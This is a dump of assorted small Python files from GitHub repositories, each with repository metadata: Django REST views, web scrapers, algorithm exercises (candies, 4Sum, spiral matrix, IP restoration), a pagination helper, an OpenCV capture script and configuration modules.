resource'},\n status=status.HTTP_401_UNAUTHORIZED)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\n@has_permission_decorator('view_comment')\ndef getIncidenceComments(request, pk):\n try:\n incidence_comments = IncidenceComment.objects.filter(incidence_id=pk)\n serializer = IncidenceCommentReadOnlySerializer(incidence_comments, many=True)\n return Response({'data': serializer.data}, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['PUT'])\n@has_permission_decorator('update_comment')\ndef updateIncidenceComment(request):\n try:\n token = decodeJWT(request)\n if token['company_id'] == request.data['company']:\n incidence_comment = IncidenceComment.objects.get(pk=request.data['incidence'])\n serializer = IncidenceCommentSerializer(incidence_comment, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({'data': serializer.data}, status=status.HTTP_200_OK)\n else:\n return Response({'error': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'error': 'You are not authorized to access this resource'},\n status=status.HTTP_401_UNAUTHORIZED)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['PUT'])\n@has_permission_decorator('update_comment')\ndef updateIncidenceState(request):\n try:\n token = decodeJWT(request)\n if token['company_id'] == request.data['company']:\n incidence_comment = IncidenceComment.objects.get(pk=request.data['incidence'])\n incidence_comment.state = request.data['state']\n 
incidence_comment.save()\n return Response({'data': 'Incidence state updated'}, status=status.HTTP_200_OK)\n else:\n return Response({'error': 'You are not authorized to access this resource'},\n status=status.HTTP_401_UNAUTHORIZED)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)","repo_name":"andersonSanchezS/task_management","sub_path":"task_server/api/views/incidence_comment/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32956261293","text":"import datetime as dt\nimport pandas as pd\nimport json\nfrom twython import Twython\n\nstates = pd.read_csv('./files/States.csv')\nstates.head()\n\ncredentials = {} \ncredentials['APP_KEY'] = 'KEY' \ncredentials['APP_SECRET'] = 'KEY' \ncredentials['ACCESS_TOKEN'] = 'TOKEN' \ncredentials['ACCESS_SECRET'] = 'TOKEN'\n\nwith open(\"twitter_credentials.json\", \"w\") as file: \n json.dump(credentials, file)\n \n\nwith open(\"twitter_credentials.json\", \"r\") as file: \n creds = json.load(file)\n\n\npython_tweets = Twython(creds['APP_KEY'], creds['APP_SECRET'])\n\ngeo = states['Geo']\nsta = states['State']\npar = states['Political Party']\n\ndict_ = {'user': [], 'date': [], 'text': [], 'id':[], 'favorite_count': [], 'retweet_num': [], 'state': [], 'party': []} \nfor i in range(0,len(geo)):\n query = {'q': '#globalwarming', \n 'count': '100',\n 'lang': 'en',\n 'until': dt.datetime.today().strftime('%Y-%m-%d'),\n 'geocode': geo[i]}\n \n for status in python_tweets.search(**query)['statuses']: \n dict_['user'].append(status['user']['screen_name'])\n dict_['date'].append(status['created_at'])\n dict_['text'].append(status['text'])\n dict_['id'].append(status['id'])\n dict_['favorite_count'].append(status['favorite_count'])\n dict_['retweet_num'].append(status['retweet_count'])\n dict_['state'].append(sta[i])\n dict_['party'].append(par[i])\n \ndf = pd.DataFrame(dict_)\ndf.to_csv('./twitter_query.csv')\n","repo_name":"Dorigh/Global-warming","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22663872064","text":"#straight runs approach: identify the strictly increasing or strictly decreasing runs\n#straight run of length k will have candy amounts 1...k with total candy k(k+1)/2\n#run ends when it switches between increasing or decreasing.\n#also ends on a repeated rank - don't know what will happen after that\n#states are 1 (increasing), -1 (decreasing), 0 (new run, not sure if increasing or decreasing yet)\n\n#still can't get this to work, too many possible cases\n#current problem: [3,4,3,1] returns 6, should be 7\n#problem is it assumes ascending part [3,4] with length 2 will have candies 1+2 = 3,\n#but actually the distribution is [1,3,2,1,2,3] -> ascenting part [3,4] has total 4\n\n\ndef candies(n, arr):\n\tstate = 0\n\tprev = arr[0]\n\tcount = 1\n\tend = False\n\ttotal = 0\n\tfor i in range(1, len(arr)):\n\t\tcurrent = arr[i]\n\t\tif state == 0:\n\t\t\tif current > prev:\n\t\t\t\tstate = 1\n\t\t\t\tcount +=1\n\t\t\tif current < prev:\n\t\t\t\tstate = -1\n\t\t\t\tcount += 1\n\t\t\tif current == prev:\n\t\t\t\tend = True\n\t\t\t\t# total += count * (count+1)/2\n\t\t\t\t# count = 1\n\t\t\t\t# state = 0\n\t\telif state == 1:\n\t\t\tif current > prev:\n\t\t\t\tcount +=1\n\t\t\telse:\n\t\t\t\tend = True\n\t\t\t\t# total += 
count * (count+1)/2\n\t\t\t\t# count = 1\n\t\t\t\t# state = 0\n\t\telif state == -1:\n\t\t\tif current < prev:\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tend = True\n\t\t\t# elif current > prev:\n\t\t\t# \t#end = True\n\t\t\t# \t#special case - count the repeated 1 in count, but not in total.\n\t\t\t# \ttotal += count * (count+1)/2\n\t\t\t# \ttotal -= 1\n\t\t\t# \tcount = 2\n\t\t\t# \tstate = 0\n\t\t\t# else: #equal - end run, starts from 1 again\n\t\t\t# \ttotal += count * (count+1)/2\n\t\t\t# \tcount = 1\n\t\t\t# \tstate = 0\n\t\tif end:\n\t\t\ttotal += count * (count+1)/2\n\t\t\tcount = 1\n\t\t\tif state == -1 and current > prev and (i == n -1 or arr[i+1] > current):\n\t\t\t\t#special case for overlapping 1 when decreasing run goes into increasing run\n\t\t\t\t#count from 2 instead, but subtract 1\n\t\t\t\tcount += 1\n\t\t\t\ttotal -= 1\n\t\t\tstate = 0\n\t\t\tend = False\n\t\tprev = current\n\t#add the last block at end of list\n\ttotal += count * (count+1)/2\n\treturn int(total)","repo_name":"c-rodwell/hackerrank","sub_path":"candies/straight_runs.py","file_name":"straight_runs.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34957088588","text":"import urllib2\nimport csv\nfrom bs4 import BeautifulSoup\nurl = {\n \"Home \": 'https://www.moneycontrol.com/',\n# \"Market\": 'https://www.moneycontrol.com/stocksmarketsindia/',\n# \"Mf Home\": 'https://www.moneycontrol.com/mutualfundindia/'\n}\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html,\"lxml\")\n elements = soup.find_all('div')[-1]\n return elements.text\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return (csv_reader[-1])\n\nfor page,url_value in url.items():\n print (page,get_last_element_timestamp(url_value))\n# print page\n##\nbse_info_csv=\"http://www.moneycontrol.com/tech_charts/bse/his/it.csv\"\nnse_info_csv = \"http://www.moneycontrol.com/tech_charts/nse/his/it.csv\"\nhistoric_sensex = \"http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv\"\nhistoric_nifty = \"http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv\"\nprint(\"Historic csv infosys => BSE\")\nprint(historic_data(bse_info_csv))\nprint (\"Historic csv of infosys => NSE\")\nprint(historic_data(nse_info_csv)) \nprint (\"Historic csv of sensex \")\nprint(historic_data(historic_sensex))\nprint (\"Historic csv of nifty\")\nprint (historic_data(historic_nifty)) \n\n\n\n\n","repo_name":"abhijeetgk/python-parse","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29663970381","text":"# 그리디\ndef is_palindrome(s, start, end):\n for i in range((end - start) // 2 + 1):\n if s[start + i] != s[end - i]:\n return False\n\n return True\n\n\ndef solution(s):\n for answer in range(len(s), 0, -1): # 문자열 최대 길이에서 하나씩 줄여나갑니다.\n start = 0 # 0에서\n end = answer - 1 # answer 길이까지\n\n while end < len(s):\n if is_palindrome(s, start, end): # 팰린드롬인지 확인합니다\n return answer # 팰린드롬이면 그대로 리턴\n start += 1\n end += 1 # 한 칸씩 순회합니다.\n\n return 1 # 한 글자일 경우 1을 리턴합니다.\n\n\n# # Manacher 알고리즘\n# def solution(s):\n# r, p = 0, 0\n\n# S = sum([[s[i], '#'] for i in range(len(s))], ['#'])\n\n# A = [0] * len(S)\n\n# for i in range(1, len(S) - 1):\n# if i < r:\n# A[i] = min(A[2 * p - i], r - i)\n\n# while i + A[i] - 
1 >= 0 and i + A[i] + 1 < len(S) and S[i - A[i] - 1] == S[i + A[i] + 1]:\n# A[i] += 1\n\n# if i + A[i] > r:\n# r = i + A[i]\n# p = i\n\n# return max(A)\n\n\n# # 응용\n# def solution(s):\n# p = 0\n\n# for i in range(len(s)):\n# if s[i - p:i + 1] == s[i - p:i + 1][::-1]:\n# p += 1\n# elif i - p > 0 and s[i - p - 1:i + 1] == s[i - p - 1:i + 1][::-1]:\n# p += 2\n\n# return p\n","repo_name":"InSeong-So/Algorithm","sub_path":"python/problem/prgrms/week04-sorting_dynamic/07_가장긴펠린드럼.py","file_name":"07_가장긴펠린드럼.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"41130261985","text":"\"\"\"\n How to using Desc Class\n\"\"\"\nclass Desc(object):\n \"\"\"This is the Descriptor class,\n it has __get__, __set__, __delete__ function\n \"\"\"\n def __get__(self, inst, type):\n print('get', self, inst, type)\n\n def __set__(self, inst, value):\n print('set', self, inst, value)\n\n\nclass Demo(object):\n desc = Desc()\n\n\nclass DemoInst(object):\n def __init__(self):\n self.desc = Desc()\n\n# Only class property will call __get__ and __set__ method\ndemo = Demo()\nprint(demo)\ndemo.desc\ndemo.desc = 'my desc'\nprint(\"--------------\")\n\n# Instance property will't call __get__ and __set__method\ndemoInst = DemoInst()\nprint(demoInst)\ndemoInst.desc\ndemoInst.desc = \"my desc\"\n\nprint(demo.__dict__)\nprint(\"--------------\")\nprint(demoInst.__dict__)\n","repo_name":"xiangtian/pytest","sub_path":"desc_test.py","file_name":"desc_test.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37209987801","text":"def date_parser(dates):\n\n \"\"\"\n A function that takes a list of datetime strings and returns only a string of dates in the 'yyyy-mm-dd' format.\n\n The input is a list of datetime strings in the formate 'yyyy-mm-dd hh:mm:ss' and the output is only the date in the 'yyyy-mm-dd' format.\n\n Args:\n dates(list): list of datetime strings\n\n returns:\n list: lists of only the date strings\n\n Example:\n >>> date_parser(dates[:3])\n ['2019-11-29', '2019-11-29', '2019-11-29']\n \"\"\"\n\n #Initializing an empty list to append a new list in\n mylist= []\n\n #slicing only the dates from the old list and appending to a new list\n for date in dates:\n mylist.append(date[:10])\n\n #returning a new list with only a string of dates.\n return mylist\n","repo_name":"banelengemntu123/Eskom24Analyse","sub_path":"eskomfunctions/function3.py","file_name":"function3.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42980185747","text":"import pandas as pd\nfrom sqlalchemy import create_engine\n\nclass SQLHandler:\n \"\"\"Classe per gestire il caricamento dei dati in un database SQL.\"\"\"\n\n def __init__(self, original_data, conn_string, schema):\n self.original_data = original_data\n self.conn_string = conn_string\n self.schema = schema\n # creazione dell' istanza 'engine' per il database\n self.engine = create_engine(self.conn_string)\n\n def load_original_data(self, table_name):\n try:\n self.original_data.to_sql(table_name, \n self.engine, \n schema=self.schema, \n if_exists='replace', \n index=False)\n except Exception as error:\n print(f\"Error loading original data: {error}\")\n\n\n def close_connection(self):\n 
self.engine.dispose()","repo_name":"LorenzoMorabito/Google_play_store_project","sub_path":"src/database_handler.py","file_name":"database_handler.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74426408408","text":"from django.conf.urls import url\nfrom apps.crud_tipousuario.views import tipoCreate, tipoList, tipoDelete, tipoUpdate, tipoShow, search\n\nurlpatterns = [\n url(r'^nuevo/', tipoCreate.as_view(), name='tipocrear'),\n url(r'^listar/', tipoList.as_view(), name='tipolistar'),\n url(r'^eliminar/(?P\\d+)/$', tipoDelete.as_view(), name='tipoeliminar'),\n url(r'^modificar/(?P\\d+)/$', tipoUpdate.as_view(), name='tipoeditar'),\n url(r'^mostrar/(?P\\d+)/$', tipoShow.as_view(), name='tipomostrar'),\n url(r'^buscar/$', search, name='tipobuscar'),\n]\n","repo_name":"ismaelzoto/Sistema-tutor-inteligente","sub_path":"apps/crud_tipousuario/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30001568068","text":"from nbformat import write\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom openpyxl import Workbook\r\n\r\nres = requests.get(\"https://finance.naver.com/\")\r\nhtml = res.content \r\n\r\nsoup = BeautifulSoup(html, 'html.parser')\r\n# print(soup)\r\n\r\na = soup.select('#container > div.aside > div > div.aside_area.aside_popular > table > tbody')\r\n# for i in a:\r\n# print(i.get_text())\r\n\r\ntbody =soup.select_one('#container > div.aside > div > div.aside_area.aside_popular > table > tbody')\r\n\r\ntrs = tbody.select('tr')\r\nprint(trs)\r\ndatas = []\r\nfor i in trs:\r\n name = i.select_one('th > a').get_text()\r\n cur_price = i.select_one('td').get_text()\r\n ch_direction = i.select_one('td > img')['alt']\r\n ch_updown = i.select_one('td > span').get_text().strip()\r\n \r\n datas.append([name, cur_price, ch_direction, ch_updown])\r\nprint(datas)\r\n\r\nwrite_wb =Workbook()\r\nwrite_ws = write_wb.create_sheet('결과')\r\n\r\nfor i in datas:\r\n write_ws.append(i)\r\n\r\nwrite_wb.save(r'financeWork.xls')\r\n\r\n","repo_name":"thansd51/python","sub_path":"day04/d4_crawling05.py","file_name":"d4_crawling05.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41873530505","text":"APP_NAME = 'Generador de Backups'\nAPP_VERSION = \"0.2.0_alpha\" # Mantener doble comillas para el CI\n\nclass Config:\n class Application:\n ROOT = 'app'\n DEBUG_MODE = 'debugMode'\n SECRET_KEY = 'secretKey'\n\n class BBDD:\n ROOT = 'bbdd'\n ENGINE = 'engine'\n NAME = 'name'\n\n class DjangoRQ:\n ROOT = 'djangoRQ'\n DASHBOARD = 'dashboard'\n DB = 'db'\n HOST = 'host'\n PORT = 'port'\n TIMEOUT = 'timeout'\n\n class Log:\n ROOT = 'log'\n NUMBER_FILES_LOG = 'numberOfLogsFile'\n LEVEL_LOG = 'levelLog'\n PATH = 'path'\n\n class MQTT:\n ROOT = 'mqtt'\n SWITCH_ENABLED = 'enabled'\n PASS = 'password'\n SERVER = 'server'\n USER = 'username'\n\nclass Backup:\n STATUS_COMPLETE: str = 'COMPLETE'\n STATUS_ERROR: str = 'ERROR'\n STATUS_PDTE: str = 'PDTE'\n\nclass MQTT:\n TOPIC: str = '/taixBackups/'\n BACKUP_GLOBAL: str = 'global'\n","repo_name":"TaixMiguel/TaixBackups","sub_path":"app/kTaixBackups.py","file_name":"kTaixBackups.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
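The kTaixBackups.py record above only declares key-name constants and never shows them in use. Below is a minimal usage sketch, assuming the application keeps its settings in a plain nested dict; the settings dict, the get_setting helper, and the trimmed-down Config subset are illustrative assumptions, not part of the record:

# Hypothetical sketch: consuming nested key-name constants like the ones
# defined in kTaixBackups.py. Only a subset of Config is mirrored here.
settings = {
    'app': {'debugMode': True, 'secretKey': 'changeme'},
    'log': {'levelLog': 'INFO', 'path': '/var/log/taix'},
}

class Config:
    class Application:
        ROOT = 'app'
        DEBUG_MODE = 'debugMode'

    class Log:
        ROOT = 'log'
        LEVEL_LOG = 'levelLog'

def get_setting(section_root, key, default=None):
    # Resolve a value through the section ROOT constant, falling back
    # to `default` when the section or the key is missing.
    return settings.get(section_root, {}).get(key, default)

if __name__ == '__main__':
    print(get_setting(Config.Application.ROOT, Config.Application.DEBUG_MODE))  # True
    print(get_setting(Config.Log.ROOT, Config.Log.LEVEL_LOG))  # INFO

Keeping the string keys in one constants module, as the record does, means a renamed configuration key only has to change in a single place.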
+{"seq_id":"31794800080","text":"\"\"\"\n1、给定一个m * n要素的矩阵。按照螺旋顺序,返回该矩阵的所有要素\n [[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]]\n 应该返回[1, 2, 3, 6, 9, 8, 7, 4, 5]\n\n2、用栈(使用list)实现队列:支持push(element),pop()和top()方法。pop和top方法都应该返回第一个元素。比如执行以下操作序列;push(1),\n pop(),push(2),push(3),top(),pop(),应该返回1,3和2。\n\"\"\"\n\n\ndef spiral_order(matrix):\n ret = []\n rows = len(matrix)\n if rows == 0:\n return ret\n columns = len(matrix[0])\n x, y = 0, 0 # 方阵的左上角坐标\n while (rows > 0) and (columns > 0):\n for k in range(y, y + columns): # 第一行\n ret.append(matrix[x][k])\n if rows > 1: # 行数大于1\n for k in range(x + 1, x + rows): # 最右列\n ret.append(matrix[k][y + columns - 1])\n if columns > 1: # 列数大于1\n for k in range(y + columns - 2, y - 1, -1): # 最下行\n ret.append(matrix[x + rows - 1][k])\n for k in range(x + rows - 2, x, -1): # 最左列\n ret.append(matrix[k][y])\n rows -= 2\n columns -= 2\n x += 1\n y += 1\n return ret\n\n\nlist_queue = []\n\n\ndef push(e):\n global list_queue\n tmp = []\n if len(list_queue) == 0:\n tmp.append(e)\n else:\n revers = list_queue[::-1]\n revers.append(e)\n tmp.extend(revers)\n list_queue = tmp[::-1]\n\n\ndef pop():\n global list_queue\n e = list_queue[0]\n list_queue.remove(e)\n return e\n\n\ndef top():\n return pop()\n\n\nprint(spiral_order([]))\nprint(spiral_order([[1]]))\nprint(spiral_order([[1, 2], [3, 4]]))\nprint(spiral_order([[1, 2, 3], [4, 5, 6], [7, 8, 9]]))\nprint(spiral_order([[1, 2, 3, 'a'], [4, 5, 6, 'b'], [7, 8, 9, 'c']]))\n\npush(1)\nprint(pop())\npush(2)\npush(3)\nprint(top())\nprint(pop())\n","repo_name":"AidenLong/rgzn","sub_path":"workspace/python-base/com/me/day3/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"1770397192","text":"# O(1) - Constant time (Flat line)\n# In this case, the no. of operations do not depend on the size of the input and are always constant\n\n\nimport time\n\nsingle_name = [\"Nemo\"]\neveryone = [\"Nemo\", \"Table\", \"Lola\", \"Toy\"]\nsmall_list = [\"Nemo\" for i in range(10)]\nmedium_list = [\"Nemo\" for m in range(100)]\nlarge_list = [\"Nemo\" for n in range(10000)]\n\n\ndef find_name(names):\n t0 = time.time()\n print(names[0]) # O(1)\n print(names[1]) # O(1)\n t1 = time.time()\n print(f\"Time taken is {t1 - t0}\")\n\n\nfind_name(small_list) # O(1)\nfind_name(medium_list) # O(1)\nfind_name(large_list) # O(1)\n\n# We are not looping over the entire array here and extracting a single element each time\n# We are performing two O(1) operations, which equal to O(2).\n# But since it's constant we can call this fn as O(1) - Constant Time Complexity.\n\n\n","repo_name":"amitaa11/Data-Structures-and-Algos","sub_path":"Big O/O(1).py","file_name":"O(1).py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74394869208","text":"from string import Template\nfrom webhelpers import paginate\nfrom webhelpers.html import HTML\n\n\nclass Page(paginate.Page):\n\n def _pagerlink(self, page, text):\n # Let the url_for() from webhelpers create a new link and set\n # the variable called 'page_param'. Example:\n # You are in '/foo/bar' (controller='foo', action='bar')\n # and you want to add a parameter 'page'. 
Then you\n # call the navigator method with page_param='page' and\n # the url_for() call will create a link '/foo/bar?page=...'\n # with the respective page number added.\n link_params = {}\n # Use the instance kwargs from Page.__init__ as URL parameters\n link_params.update(self.kwargs)\n # Add keyword arguments from pager() to the link as parameters\n link_params.update(self.pager_kwargs)\n link_params[self.page_param] = page\n\n # Get the URL generator\n if self._url_generator is not None:\n url_generator = self._url_generator\n else:\n try:\n import pylons\n url_generator = pylons.url.current\n except (ImportError, AttributeError):\n try:\n import routes\n url_generator = routes.url_for\n config = routes.request_config()\n except (ImportError, AttributeError):\n raise NotImplementedError(\"no URL generator available\")\n else:\n # if the Mapper is configured with explicit=True we have to fetch\n # the controller and action manually\n if config.mapper.explicit:\n if hasattr(config, 'mapper_dict'):\n for k, v in config.mapper_dict.items():\n if k != self.page_param:\n link_params[k] = v\n\n # Create the URL to load a certain page\n link_url = url_generator(**link_params)\n\n if self.onclick: # create link with onclick action for AJAX\n # Create the URL to load the page area part of a certain page (AJAX\n # updates)\n link_params[self.partial_param] = 1\n partial_url = url_generator(**link_params)\n try: # if '%s' is used in the 'onclick' parameter (backwards compatibility)\n onclick_action = self.onclick % (partial_url,)\n except TypeError:\n onclick_action = Template(self.onclick).safe_substitute({\n \"partial_url\": partial_url,\n \"page\": page\n })\n a_tag = HTML.a(text, href=link_url, onclick=onclick_action, **self.link_attr)\n else: # return static link\n a_tag = HTML.a(text, href=link_url, **self.link_attr)\n li_tag = HTML.li(a_tag)\n return li_tag\n\n def _range(self, regexp_match):\n \"\"\"\n Return range of linked pages (e.g. '1 2 [3] 4 5 6 7 8').\n\n Arguments:\n\n regexp_match\n A \"re\" (regular expressions) match object containing the\n radius of linked pages around the current page in\n regexp_match.group(1) as a string\n\n This function is supposed to be called as a callable in\n re.sub.\n\n \"\"\"\n radius = int(regexp_match.group(1))\n\n # Compute the first and last page number within the radius\n # e.g. '1 .. 5 6 [7] 8 9 .. 12'\n # -> leftmost_page = 5\n # -> rightmost_page = 9\n leftmost_page = max(self.first_page, (self.page - radius))\n rightmost_page = min(self.last_page, (self.page + radius))\n\n nav_items = []\n\n # Create a link to the first page (unless we are on the first page\n # or there would be no need to insert '..' 
spacers)\n if self.page != self.first_page and self.first_page < leftmost_page:\n nav_items.append(self._pagerlink(self.first_page, self.first_page))\n\n # Insert dots if there are pages between the first page\n # and the currently displayed page range\n if leftmost_page - self.first_page > 1:\n # Wrap in a SPAN tag if nolink_attr is set\n text = '..'\n if self.dotdot_attr:\n text = HTML.span(c=text, **self.dotdot_attr)\n text = HTML.li(text, **{'class': 'disabled'})\n nav_items.append(text)\n\n for thispage in xrange(leftmost_page, rightmost_page + 1):\n # Hilight the current page number and do not use a link\n if thispage == self.page:\n text = '%s' % (thispage,)\n # Wrap in a SPAN tag if nolink_attr is set\n if self.curpage_attr:\n text = HTML.span(c=text, **self.curpage_attr)\n text = HTML.li(text, **{'class': 'active'})\n nav_items.append(text)\n # Otherwise create just a link to that page\n else:\n text = '%s' % (thispage,)\n nav_items.append(self._pagerlink(thispage, text))\n\n # Insert dots if there are pages between the displayed\n # page numbers and the end of the page range\n if self.last_page - rightmost_page > 1:\n text = '..'\n # Wrap in a SPAN tag if nolink_attr is set\n if self.dotdot_attr:\n text = HTML.span(c=text, **self.dotdot_attr)\n text = HTML.li(text, **{'class': 'disabled'})\n nav_items.append(text)\n\n # Create a link to the very last page (unless we are on the last\n # page or there would be no need to insert '..' spacers)\n if self.page != self.last_page and rightmost_page < self.last_page:\n nav_items.append(self._pagerlink(self.last_page, self.last_page))\n\n return self.separator.join(nav_items)","repo_name":"josiah-wolf-oberholtzer/sasha","sub_path":"sasha/tools/viewtools/Page.py","file_name":"Page.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"25917400076","text":"\"\"\"\nException class of the app\nAs well as common messages\n\"\"\"\nfrom .conf import maildict, conf\n\n\nclass AppError(Exception): # base exception of the web app\n pass\n\n\nclass AppAPIError(AppError): # abstract error, directly use not recommended\n status_code = 500\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n\nclass InvalidInput(AppAPIError):\n status_code = 422\n\n\nclass PermissionDenied(AppAPIError):\n status_code = 403\n\n\nappmessage = {\n \"mail_check\": \"\"\"\n If you cannot find the mail, you should check junk mails.\\n\n Please make sure the mail address is our official address %s.\n \"\"\" % maildict['sender'],\n\n \"mail_start\": \"\"\"\n This is the mail from %s.\\n\n \"\"\" % conf['MAIL_ABS_PATH']\n}\n","repo_name":"refraction-ray/myarxiv-app","sub_path":"app/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30506177011","text":"#\n# @lc app=leetcode id=18 lang=python3\n#\n# [18] 4Sum\n#\n\n# @lc code=start\n\n\nclass Solution:\n # two pointers\n def twoSum(self, nums, target):\n res = []\n l, r = 0, len(nums)-1\n\n while l < r:\n sum = nums[l] + nums[r]\n if sum < target or (l > 0 and nums[l] == nums[l-1]):\n l += 1\n elif sum > target or (r < len(nums)-1 and 
nums[r] == nums[r+1]):\n r -= 1\n else:\n res.append([nums[l], nums[r]])\n l += 1\n r -= 1\n\n return res\n # hash-set\n\n def twoSum(self, nums, target):\n res = []\n s = set()\n\n for i in range(len(nums)):\n if len(res) == 0 or res[-1][1] != nums[i]:\n if target - nums[i] in s:\n res.append([target - nums[i], nums[i]])\n s.add(nums[i])\n\n return res\n\n def kSum(self, nums, target, k):\n if len(nums) == 0 or nums[0] * k > target or target > nums[-1] * k:\n return []\n if k == 2:\n return self.twoSum(nums, target)\n\n res = []\n for i in range(len(nums)):\n if i == 0 or nums[i-1] != nums[i]:\n for _, set in enumerate(self.kSum(nums[i+1:], target-nums[i], k-1)):\n res.append([nums[i]] + set)\n return res\n\n def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n nums.sort()\n return self.kSum(nums, target, 4)\n# @lc code=end\n","repo_name":"naseeihity/leetcode-daily","sub_path":"two-pointers/18.4-sum.py","file_name":"18.4-sum.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37496093506","text":"class Solution:\n def restoreIpAddresses(self, s: str) -> list[str]:\n ans, path = [], []\n n = len(s)\n\n def backTrack(l: int) -> None:\n if len(path) > 4: #长度超过四个了,剪枝\n return\n if l == n and len(path) == 4:\n ans.append('.'.join(path))\n return\n for i in range(l + 1, min(l + 4, n + 1)):\n cur = s[l:i]\n if (len(cur) > 1 and cur[0] == '0') or int(cur) > 255: #前缀0和大于255的都丢弃\n continue\n path.append(cur[:])\n backTrack(i)\n path.pop()\n backTrack(0)\n return ans","repo_name":"qbnmmm/leetcode","sub_path":"剑指offer/剑指 Offer II 087. 复原 IP.py","file_name":"剑指 Offer II 087. 复原 IP.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33666628338","text":"#!/usr/bin/env python\n# J094\n\"\"\"\nImage capture and save\n\"\"\"\n\n\nimport cv2\n\n\ncap = cv2.VideoCapture(0)\nflag = cap.isOpened()\n\ncap.set(cv2.CAP_PROP_FRAME_WIDTH,1280)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT,480)\n\nindex = 1\n\nwhile (flag):\n ret, frame = cap.read()\n cv2.imshow(\"cheese by cv2\", frame)\n k = cv2.waitKey(1) & 0xFF\n if k == ord('s'): # 按下s键,进入下面的保存图片操作\n cv2.imwrite(\"./\" + str(index) + \".jpg\", frame)\n print(\"save\" + str(index) + \".jpg successfuly!\")\n print(\"-------------------------\")\n index += 1\n elif k == ord('q'): # 按下q键,程序退出\n break\ncap.release() # 释放摄像头\ncv2.destroyAllWindows()# 释放并销毁窗口\n","repo_name":"J094/stereo_vision","sub_path":"image_capture.py","file_name":"image_capture.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74216078487","text":"\"\"\"core URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
